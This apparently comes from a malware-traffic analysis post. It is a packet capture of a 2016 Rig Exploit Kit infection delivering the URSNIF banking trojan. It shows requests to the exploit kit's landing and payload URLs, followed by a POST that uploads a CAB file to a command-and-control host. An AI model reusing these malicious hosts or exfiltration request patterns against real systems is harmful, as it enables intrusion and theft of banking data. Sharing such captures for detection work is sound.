Packet Analysis Rig Exploit Kit EK Delivers URSNIF Banking Trojan Malware PCAP file download sample

2016-09-02 10:26:46.478966 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [P.], seq 1:391, ack 1, win 16537, length 390: HTTP:
GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
E…..@…[……….F.Pbe.c….P.@..P..GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9s
s1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.gaapasa.com.au/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: sivupig.top
Connection: Keep-Alive

2016-09-02 10:26:46.774522 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [F.], seq 391, ack 5942, win 16402, length 0
E..(..@…\……….F.Pbe…..(P.@./&……..
2016-09-02 10:26:47.007595 IP 192.168.4.200.49221 > 194.165.16.204.80: Flags [P.], seq 1:403, ack 1, win 16537, length 402: HTTP: GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
E….!@…[;………E.P$W…YA*P.@…..GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gaapasa.com.au/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sivupig.top
Connection: Keep-Alive

 

 

 

 

 

2016-09-02 10:32:18.729778 IP 192.168.4.200.49233 > 185.39.72.169.80: Flags [P.], seq 1:941, ack 1, win 16537, length 940: HTTP:
POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJY4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/zn
Rft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
E…..@…’E…..’H..Q.P..;.p…P.@.j&..POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJ
Y4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/znRft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=————————–8d26b8d26b8d26b
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: diokamkahmi.at
Content-Length: 465
Connection: Keep-Alive
Cache-Control: no-cache

—————————-8d26b8d26b8d26b
Content-Disposition: form-data; name=”upload_file”; filename=”CA1E.bin”
Content-Type: application/octet-stream

MSCF…………,……………….O…….T………”I.D .01D205160934258A0B.=Z….T.CK..M..@…..w…D…p.Mt…CHd .Q/..q.,\h
&m……..1″$…’……….2`……………D.T…….E.l…0….\….l.Z….t…’…….. .[…….L……j..Ku.W….AS…s_..
—————————-8d26b8d26b8d26b–

2016-09-02 10:32:19.386415 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [.], ack 941, win 64595, length 0
E..(E}@.2.<..’H……P.Qp…..?.P..S….
2016-09-02 10:32:19.386531 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [P.], seq 1:135, ack 941, win 64595, length 134: HTTP
: HTTP/1.1 200 OK
E…E.@.2.;f.’H……P.Qp…..?.P..S@…HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 12:32:03 GMT
Content-Type: text/html
Content-Length: 0
Connection: close

Leave a Reply